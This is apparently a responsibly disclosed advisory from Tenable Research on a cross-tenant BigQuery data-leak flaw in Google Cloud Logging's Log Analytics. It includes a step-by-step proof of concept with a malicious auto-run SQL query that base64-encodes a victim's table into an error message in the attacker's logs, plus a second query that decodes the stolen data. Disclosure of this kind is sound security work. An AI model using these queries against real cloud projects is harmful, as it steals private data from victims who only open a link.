Google Cloud Platform (GCP) Cloud Logging Cross-Tenant BigQuery Leak with Log Analytics

Tenable Research has identified and responsibly disclosed a data exfiltration vulnerability in Google Cloud Logging. This flaw allowed an attacker to exfiltrate data from a victim’s BigQuery datasets by visiting a maliciously crafted Cloud Logging URL.

When a user navigates to a Log Analytics URL, the embedded SQL query is automatically submitted, even when set to use the BigQuery engine. An attacker could exploit this behavior by granting the victim BigQuery permissions in the attacker’s project and crafting a malicious URL containing a “Join” query. The query links a log view in the attacker’s project to a sensitive dataset in the victim’s project. Because the query is executed in the context of the user viewing the page, it runs with the victim’s permissions. The attacker can therefore create a URL for a Log Analytics query that runs in their own project, but raises the results of the victim’s dataset as an error. When the victim browses to the URL, their private BigQuery data will be exfiltrated to the attacker’s project logs.

Proof of Concept:

1. Make sure that Log Analytics is active, with a reservation and that there is at least one log view available with a linked BigQuery dataset
2. Give the victim’s principal IAM permissions in the attacker’s tenant
3. Browse to Log Analytics
4. Click ‘<> SQL’ to change the query builder into SQL mode
5. Click the settings cog icon, and select the BigQuery engine
6. Run any legitimate query
7. Copy the URL, and replace the legitimate query with a malicious query:

SELECT

   ERROR(CONCAT(‘EXFIL: ‘, TO_BASE64(

         CAST(

           TO_JSON_STRING(ARRAY_AGG(t)) AS BYTES

     ))

   ))

FROM (

      SELECT t

  FROM

    `[ATTACKER_PROJECT].global._Default._AllLogs` AS l

    CROSS JOIN `[VICTIM_PROJECT].[VICTIM_DATASET].[VICTIM_TABLE]` AS t

  LIMIT 1 OFFSET 0

);

8. Get the victim to browse to the new malicious URL, which will run the query automatically
9. Once the victim browses to the URL, query the logs to view the exfiltrated data:

SELECT

    CAST(

    FROM_BASE64(

      REGEXP_EXTRACT(

        proto_payload.audit_log.status.message, r’^EXFIL:\s+([A-Za-z0-9+/=]+)’

      )

    ) AS STRING

  )

FROM

  `[ATTACKER_PROJECT].global._Default._AllLogs`

WHERE severity = “ERROR” AND starts_with(proto_payload.audit_log.status.message, ‘EXFIL’)

ORDER BY timestamp DESC